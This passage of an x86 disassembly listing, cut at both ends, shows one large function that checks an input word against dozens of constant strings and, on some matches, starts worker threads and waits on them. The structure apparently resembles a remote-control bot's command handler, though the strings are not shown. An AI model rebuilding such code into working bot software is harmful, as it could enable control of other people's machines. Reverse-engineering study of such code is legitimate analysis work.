push eax
call sub_419300
lea eax, [ebp+var_B4]
push 43A64Ch
push eax
call sub_419260
add esp, 1Ch
cmp [ebp+var_B4], 30h
jl short loc_410A27
cmp [ebp+var_B4], 39h
jle short loc_410A3D
loc_410A27: ; CODE XREF: sub_40FCA3+D79�j
push 3
lea eax, [ebp+var_B4]
push 43A648h
push eax
call sub_419300
add esp, 0Ch
loc_410A3D: ; CODE XREF: sub_40FCA3+D82�j
lea eax, [ebp+var_B4]
push eax
call sub_417ECF
test eax, eax
pop ecx
jle short loc_410A60
lea eax, [ebp+var_B4]
push eax
call sub_417ECF
pop ecx
mov [ebp+var_14], al
jmp short loc_410A71
; ---------------------------------------------------------------------------
loc_410A60: ; CODE XREF: sub_40FCA3+DA9�j
call sub_4179B7
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_410A71: ; CODE XREF: sub_40FCA3+DBB�j
lea eax, [ebp+var_B4]
mov [ebp+var_13], bl
push eax
call sub_4180D0
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_B4]
push ebx
push eax
call sub_4179E0
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_B4]
push dword ptr [ebp+arg_10]
push eax
call sub_419300
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+addr]
call sub_40B124
push 43A650h
push [ebp+addr]
call sub_417F60
add esp, 30h
loc_410ACB: ; CODE XREF: sub_40FCA3+D37�j
test eax, eax
jnz loc_4109DF
push 1FFh
lea eax, [ebp+var_22A8]
push [ebp+addr]
push eax
call sub_419300
lea eax, [ebp+var_22A8]
push 1FFh
push eax
lea eax, [ebp+var_24A8]
push eax
call sub_419300
lea eax, [ebp+var_24A8]
push 42AD00h
push eax
call sub_419260
add esp, 20h
mov [ebp+var_94], eax
mov dword ptr [ebp+arg_10], 1
loc_410B20: ; CODE XREF: sub_40FCA3+E9B�j
push 42AD00h
push ebx
call sub_419260
pop ecx
pop ecx
mov ecx, dword ptr [ebp+arg_10]
inc dword ptr [ebp+arg_10]
cmp dword ptr [ebp+arg_10], 20h
mov [ebp+ecx*4+var_94], eax
jl short loc_410B20
lea eax, [ebp+esi+var_94]
mov ecx, [eax]
cmp ecx, ebx
jz loc_4100FB
add ecx, 3
mov [eax], ecx
loc_410B56: ; CODE XREF: sub_40FCA3+CB8�j
mov eax, [ebp+esi+var_94]
push eax
push 43A63Ch
mov dword ptr [ebp+arg_8], eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415ED6
push dword ptr [ebp+arg_8]
push 43A638h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415ED6
push dword ptr [ebp+arg_8]
push 43A634h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415EB4
push dword ptr [ebp+arg_8]
push 43A62Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415EB4
push dword ptr [ebp+arg_8]
push 43510Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415DF2
push dword ptr [ebp+arg_8]
push 43A628h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415DF2
push dword ptr [ebp+arg_8]
push 43A620h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415DB9
push dword ptr [ebp+arg_8]
push 43A61Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415DB9
push dword ptr [ebp+arg_8]
push 43A614h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415CBB
push dword ptr [ebp+arg_8]
push 43A60Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415CBB
push dword ptr [ebp+arg_8]
push 43A5FCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415CBB
push dword ptr [ebp+arg_8]
push 43A5F4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415CBB
push dword ptr [ebp+arg_8]
push 43A5E8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B93
push dword ptr [ebp+arg_8]
push 43A5DCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B93
push dword ptr [ebp+arg_8]
push 43A5D0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410CCB
push [ebp+esi+lpExistingFileName]
push 13h
push 43A5C8h
push 43A5B8h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410CCB: ; CODE XREF: sub_40FCA3+100E�j
push dword ptr [ebp+arg_8]
push 43A5ACh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410CF6
push [ebp+esi+lpExistingFileName]
push 3
push 43A5C8h
push 43A5A0h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410CF6: ; CODE XREF: sub_40FCA3+1039�j
push dword ptr [ebp+arg_8]
push 43A598h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410D21
push [ebp+esi+lpExistingFileName]
push 1Fh
push 43A58Ch
push 43A580h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410D21: ; CODE XREF: sub_40FCA3+1064�j
push dword ptr [ebp+arg_8]
push 43A570h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410D4C
push [ebp+esi+lpExistingFileName]
push 12h
push 43A560h
push 43A550h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410D4C: ; CODE XREF: sub_40FCA3+108F�j
push dword ptr [ebp+arg_8]
push 43A544h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410D77
push [ebp+esi+lpExistingFileName]
push 0Ah
push 43A538h
push 43A52Ch
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410D77: ; CODE XREF: sub_40FCA3+10BA�j
push dword ptr [ebp+arg_8]
push 43A524h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410DA2
push [ebp+esi+lpExistingFileName]
push 0Dh
push 43A518h
push 43A50Ch
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410DA2: ; CODE XREF: sub_40FCA3+10E5�j
push dword ptr [ebp+arg_8]
push 43A504h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410DCD
push [ebp+esi+lpExistingFileName]
push 11h
push 43A4F8h
push 43A4ECh
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410DCD: ; CODE XREF: sub_40FCA3+1110�j
push dword ptr [ebp+arg_8]
push 43A4E0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410DF8
push [ebp+esi+lpExistingFileName]
push 10h
push 43A4D4h
push 43A4C8h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410DF8: ; CODE XREF: sub_40FCA3+113B�j
push dword ptr [ebp+arg_8]
push 43A4BCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410E23
push [ebp+esi+lpExistingFileName]
push 4
push 43A5C8h
push 43A4B0h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410E23: ; CODE XREF: sub_40FCA3+1166�j
push dword ptr [ebp+arg_8]
push 43A4A0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B66
push dword ptr [ebp+arg_8]
push 43A494h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B66
push dword ptr [ebp+arg_8]
push 43A488h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B51
push dword ptr [ebp+arg_8]
push 43A47Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B51
push dword ptr [ebp+arg_8]
push 43A470h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410EAA
push [ebp+esi+lpExistingFileName]
push 1Ah
push 43A468h
push 43A458h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410EAA: ; CODE XREF: sub_40FCA3+11ED�j
push dword ptr [ebp+arg_8]
push 43A44Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410ED5
push [ebp+esi+lpExistingFileName]
push 1Ch
push 43A444h
push 43A434h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410ED5: ; CODE XREF: sub_40FCA3+1218�j
push dword ptr [ebp+arg_8]
push 43A42Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410F00
push [ebp+esi+lpExistingFileName]
push 8
push 43A424h
push 43A414h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_410F00: ; CODE XREF: sub_40FCA3+1243�j
push dword ptr [ebp+arg_8]
push 43A40Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B3A
push dword ptr [ebp+arg_8]
push 43A404h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B3A
push dword ptr [ebp+arg_8]
push 43A3F8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B1B
push dword ptr [ebp+arg_8]
push 43A3F0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415B1B
push dword ptr [ebp+arg_8]
push 43A3E4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415AFB
push dword ptr [ebp+arg_8]
push 43A3DCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415AFB
push dword ptr [ebp+arg_8]
push 43A3D4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415AB6
push dword ptr [ebp+arg_8]
push 43A3CCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415AB6
push dword ptr [ebp+arg_8]
push 43A3C4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415A7A
push dword ptr [ebp+arg_8]
push 43A3BCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415A7A
push dword ptr [ebp+arg_8]
push 43A3B8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415A45
push dword ptr [ebp+arg_8]
push 43A3B0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415A45
push dword ptr [ebp+arg_8]
push 43A3A8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411066
call sub_40B562
test eax, eax
mov eax, 43A37Ch
jnz short loc_41103A
mov eax, 43A348h
loc_41103A: ; CODE XREF: sub_40FCA3+1390�j
push eax
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 1Ch
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_411066: ; CODE XREF: sub_40FCA3+1382�j
push dword ptr [ebp+arg_8]
push 43A340h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41596A
push dword ptr [ebp+arg_8]
push 43A334h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41596A
push dword ptr [ebp+arg_8]
push 43A328h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415949
push dword ptr [ebp+arg_8]
push 43A320h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415949
push dword ptr [ebp+arg_8]
push 43A31Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41585D
push dword ptr [ebp+arg_8]
push 43A314h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41585D
push dword ptr [ebp+arg_8]
push 43A308h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415843
push dword ptr [ebp+arg_8]
push 43A2FCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415843
push dword ptr [ebp+arg_8]
push 43A2F4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41580D
push dword ptr [ebp+arg_8]
push 43A2ECh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41580D
push dword ptr [ebp+arg_8]
push 43A2E0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_41125F
mov eax, [ebp+esi+lpExistingFileName]
push 7Fh
mov [ebp+addr], eax
push eax
lea eax, [ebp+var_1230]
push eax
call sub_419300
mov eax, [ebp+esi+hFile]
push 7Fh
mov dword ptr [ebp+lpNewFileName], eax
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_419300
mov esi, [ebp+esi+var_88]
push 7Fh
lea eax, [ebp+var_1130]
push esi
push eax
call sub_419300
push 7Fh
lea eax, [ebp+var_10B0]
push [ebp+hFile]
push eax
call sub_419300
mov eax, [ebp+var_4]
push esi
push dword ptr [ebp+lpNewFileName]
mov [ebp+var_102C], eax
mov eax, [ebp+var_8]
mov [ebp+var_1234], edi
push [ebp+addr]
mov [ebp+var_1028], eax
lea eax, [ebp+var_2EC]
push 43A2A0h
push eax
call sub_41795B
add esp, 44h
lea eax, [ebp+var_2EC]
push ebx
push 16h
push eax
call sub_41741F
add esp, 0Ch
mov [ebp+var_1030], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_1234]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_401BD2 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_1030]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_411252
call GetLastError
push eax
push 43A250h
jmp loc_415E85
; ---------------------------------------------------------------------------
loc_41124A: ; CODE XREF: sub_40FCA3+15B5�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_411252: ; CODE XREF: sub_40FCA3+1594�j
cmp [ebp+var_1024], ebx
jz short loc_41124A
jmp loc_415E94
; ---------------------------------------------------------------------------
loc_41125F: ; CODE XREF: sub_40FCA3+14BA�j
push dword ptr [ebp+arg_8]
push 43A244h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4157E6
push dword ptr [ebp+arg_8]
push 43A23Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4157E6
push dword ptr [ebp+arg_8]
push 43A234h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4157B0
push dword ptr [ebp+arg_8]
push 43A234h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4157B0
push dword ptr [ebp+arg_8]
push 43A22Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415693
push dword ptr [ebp+arg_8]
push 43A224h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415693
push dword ptr [ebp+arg_8]
push 43A218h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41566B
push dword ptr [ebp+arg_8]
push 43A210h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41566B
push dword ptr [ebp+arg_8]
push 43A208h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4155E5
push dword ptr [ebp+arg_8]
push 43A200h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4155E5
push dword ptr [ebp+arg_8]
push 43A1F4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4155CA
push dword ptr [ebp+arg_8]
push 43A1ECh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4155CA
push dword ptr [ebp+arg_8]
push 43A1E0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4155B3
push dword ptr [ebp+arg_8]
push 43A1D8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4155B3
push dword ptr [ebp+arg_8]
push 43A1D0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415553
push dword ptr [ebp+arg_8]
push 43A1C4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415553
push dword ptr [ebp+arg_8]
push 43A1B8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4113FA
push [ebp+esi+lpExistingFileName]
push 7
push 43A1A8h
push 43A1A0h
jmp loc_415B79
; ---------------------------------------------------------------------------
loc_4113FA: ; CODE XREF: sub_40FCA3+173D�j
push dword ptr [ebp+arg_8]
push 43A19Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411488
cmp [ebp+var_8], ebx
jnz short loc_41142A
push ebx ; int
push [ebp+var_4] ; int
push 43A18Ch ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 14h
loc_41142A: ; CODE XREF: sub_40FCA3+176D�j
mov eax, dword ptr [ebp+lpNewFileName]
xor esi, esi
mov [ebp+s], eax
jmp short loc_411437
; ---------------------------------------------------------------------------
loc_411434: ; CODE XREF: sub_40FCA3+17D9�j
mov eax, [ebp+s]
loc_411437: ; CODE XREF: sub_40FCA3+178F�j
cmp [eax], bl
jz short loc_41143E
inc eax
jmp short loc_411443
; ---------------------------------------------------------------------------
loc_41143E: ; CODE XREF: sub_40FCA3+1796�j
mov eax, 43A184h
loc_411443: ; CODE XREF: sub_40FCA3+1799�j
push eax
push esi
lea eax, [ebp+var_2EC]
push 43A17Ch
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add [ebp+s], 80h
add esp, 24h
inc esi
cmp esi, 2
jl short loc_411434
push 43A14Ch
jmp loc_414831
; ---------------------------------------------------------------------------
loc_411488: ; CODE XREF: sub_40FCA3+1768�j
push dword ptr [ebp+arg_8]
push 43A140h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415516
push dword ptr [ebp+arg_8]
push 43A138h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415516
push dword ptr [ebp+arg_8]
push 43A12Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4154EB
push dword ptr [ebp+arg_8]
push 43A120h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4154EB
push dword ptr [ebp+arg_8]
push 43A114h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4154BB
push dword ptr [ebp+arg_8]
push 43A108h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4154BB
push dword ptr [ebp+arg_8]
push 43A0FCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415483
push dword ptr [ebp+arg_8]
push 43A0F8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415483
push dword ptr [ebp+arg_8]
push 43A0ECh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4152F0
push dword ptr [ebp+arg_8]
push 43A0DCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4152F0
push dword ptr [ebp+arg_8]
push 43A0D4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4151B4
push dword ptr [ebp+arg_8]
push 43A0C4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4151B4
push dword ptr [ebp+arg_8]
push 436DACh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411602
lea eax, [ebp+var_2EC]
push 43A09Ch
push eax
call sub_41795B
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_4115E1
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 14h
loc_4115E1: ; CODE XREF: sub_40FCA3+1922�j
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
mov [esp+10h+ThreadId], 436DACh
push [ebp+esi+var_80]
call sub_417D80
jmp loc_4160A2
; ---------------------------------------------------------------------------
loc_411602: ; CODE XREF: sub_40FCA3+190A�j
push dword ptr [ebp+arg_8]
push 43A090h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415111
push dword ptr [ebp+arg_8]
push 43A088h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415111
push dword ptr [ebp+arg_8]
push 43A080h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414E0F
push dword ptr [ebp+arg_8]
push 43A074h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414E0F
mov edi, [ebp+esi+lpExistingFileName]
cmp edi, ebx
jz loc_4100FB
push dword ptr [ebp+arg_8]
push 43A068h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414DEE
push dword ptr [ebp+arg_8]
push 43A060h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414DEE
push dword ptr [ebp+arg_8]
push 43A058h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414DCE
push dword ptr [ebp+arg_8]
push 43A050h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414DCE
push dword ptr [ebp+arg_8]
push 43A048h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414DB8
push dword ptr [ebp+arg_8]
push 43A040h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414DB8
push dword ptr [ebp+arg_8]
push 43A03Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414D84
push dword ptr [ebp+arg_8]
push 43A034h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414D84
push dword ptr [ebp+arg_8]
push 43A024h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414CC6
push dword ptr [ebp+arg_8]
push 43A018h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414CC6
push dword ptr [ebp+arg_8]
push 43A00Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414C1B
push dword ptr [ebp+arg_8]
push 43A004h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414C1B
push dword ptr [ebp+arg_8]
push 439FF4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414BCD
push dword ptr [ebp+arg_8]
push 439FE8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414BCD
push dword ptr [ebp+arg_8]
push 439FDCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414BA9
push dword ptr [ebp+arg_8]
push 439FD4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414BA9
push dword ptr [ebp+arg_8]
push 439FC8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414B79
push dword ptr [ebp+arg_8]
push 439FC0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414B79
push dword ptr [ebp+arg_8]
push 439FB0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414B54
push dword ptr [ebp+arg_8]
push 439FA8h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414B54
push dword ptr [ebp+arg_8]
push 439FA4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414AE4
push dword ptr [ebp+arg_8]
push 439F9Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414AE4
push dword ptr [ebp+arg_8]
push 439F98h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414AB2
push dword ptr [ebp+arg_8]
push 439F90h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414AB2
push dword ptr [ebp+arg_8]
push 439F8Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414A57
push dword ptr [ebp+arg_8]
push 439F80h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414A57
push dword ptr [ebp+arg_8]
push 439F78h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414A23
push dword ptr [ebp+arg_8]
push 439F70h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414A23
push dword ptr [ebp+arg_8]
push 439F68h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414943
push dword ptr [ebp+arg_8]
push 439F60h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414943
push dword ptr [ebp+arg_8]
push 439F54h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414928
push dword ptr [ebp+arg_8]
push 439F4Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414928
push dword ptr [ebp+arg_8]
push 439F44h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41483C
push dword ptr [ebp+arg_8]
push 439F3Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41483C
push dword ptr [ebp+arg_8]
push 439F30h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4147C8
push dword ptr [ebp+arg_8]
push 439F30h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4147C8
push dword ptr [ebp+arg_8]
push 439F28h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414774
push dword ptr [ebp+arg_8]
push 439F20h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_414774
push dword ptr [ebp+arg_8]
push 439F10h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4146EF
push dword ptr [ebp+arg_8]
push 439F08h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4146EF
push dword ptr [ebp+arg_8]
push 439F00h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_411B51
push edi
push 439EFCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_411B19
push 1Bh
call sub_417661
test eax, eax
pop ecx
jle short loc_411A47
push 439ECCh
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_411A47: ; CODE XREF: sub_40FCA3+1D98�j
mov eax, [ebp+s]
mov esi, [ebp+esi+hFile]
mov [ebp+var_380], eax
mov eax, [ebp+var_4]
mov [ebp+StartupInfo.hStdInput], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+StartupInfo.hStdOutput], eax
jnz short loc_411A89
mov esi, 4316ACh
push 440F9Ch
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411A89
mov esi, [ebp+hFile]
loc_411A89: ; CODE XREF: sub_40FCA3+1DC8�j
; sub_40FCA3+1DDE�j
push esi
lea eax, [ebp+var_37C]
push 80h
push eax
call sub_417EDA
lea eax, [ebp+var_2EC]
push 439E8Ch
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 1Bh
push eax
call sub_41741F
add esp, 20h
mov [ebp+StartupInfo.lpReserved2], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_380]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_402BB1 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+StartupInfo.lpReserved2]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_411B0C
call GetLastError
push eax
push 439E40h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_411B04: ; CODE XREF: sub_40FCA3+1E6F�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_411B0C: ; CODE XREF: sub_40FCA3+1E4E�j
cmp [ebp+StartupInfo.hStdError], ebx
jz short loc_411B04
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_411B19: ; CODE XREF: sub_40FCA3+1D88�j
push edi
push 439E38h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_412AF4
push ebx
push 1Bh
call sub_417614
pop ecx
cmp eax, ebx
pop ecx
jle short loc_411B47
push eax
push 439DF0h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_411B47: ; CODE XREF: sub_40FCA3+1E97�j
push 439DB8h
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_411B51: ; CODE XREF: sub_40FCA3+1D73�j
push dword ptr [ebp+arg_8]
push 439DB0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_411C9D
push edi
push 439EFCh
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_411C65
push 0Ch
call sub_417661
test eax, eax
pop ecx
jle short loc_411B93
push 439D80h
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_411B93: ; CODE XREF: sub_40FCA3+1EE4�j
mov eax, [ebp+s]
mov esi, [ebp+esi+hFile]
mov [ebp+var_380], eax
mov eax, [ebp+var_4]
mov [ebp+StartupInfo.hStdInput], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+StartupInfo.hStdOutput], eax
jnz short loc_411BD5
mov esi, 4316ACh
push 440F9Ch
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_411BD5
mov esi, [ebp+hFile]
loc_411BD5: ; CODE XREF: sub_40FCA3+1F14�j
; sub_40FCA3+1F2A�j
push esi
lea eax, [ebp+var_37C]
push 80h
push eax
call sub_417EDA
lea eax, [ebp+var_2EC]
push 439D4Ch
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 0Ch
push eax
call sub_41741F
add esp, 20h
mov [ebp+StartupInfo.lpReserved2], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_380]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40321F ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+StartupInfo.lpReserved2]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_411C58
call GetLastError
push eax
push 439D00h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_411C50: ; CODE XREF: sub_40FCA3+1FBB�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_411C58: ; CODE XREF: sub_40FCA3+1F9A�j
cmp [ebp+StartupInfo.hStdError], ebx
jz short loc_411C50
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_411C65: ; CODE XREF: sub_40FCA3+1ED4�j
push edi
push 439E38h
call sub_417D80
pop ecx
test eax, eax
pop ecx
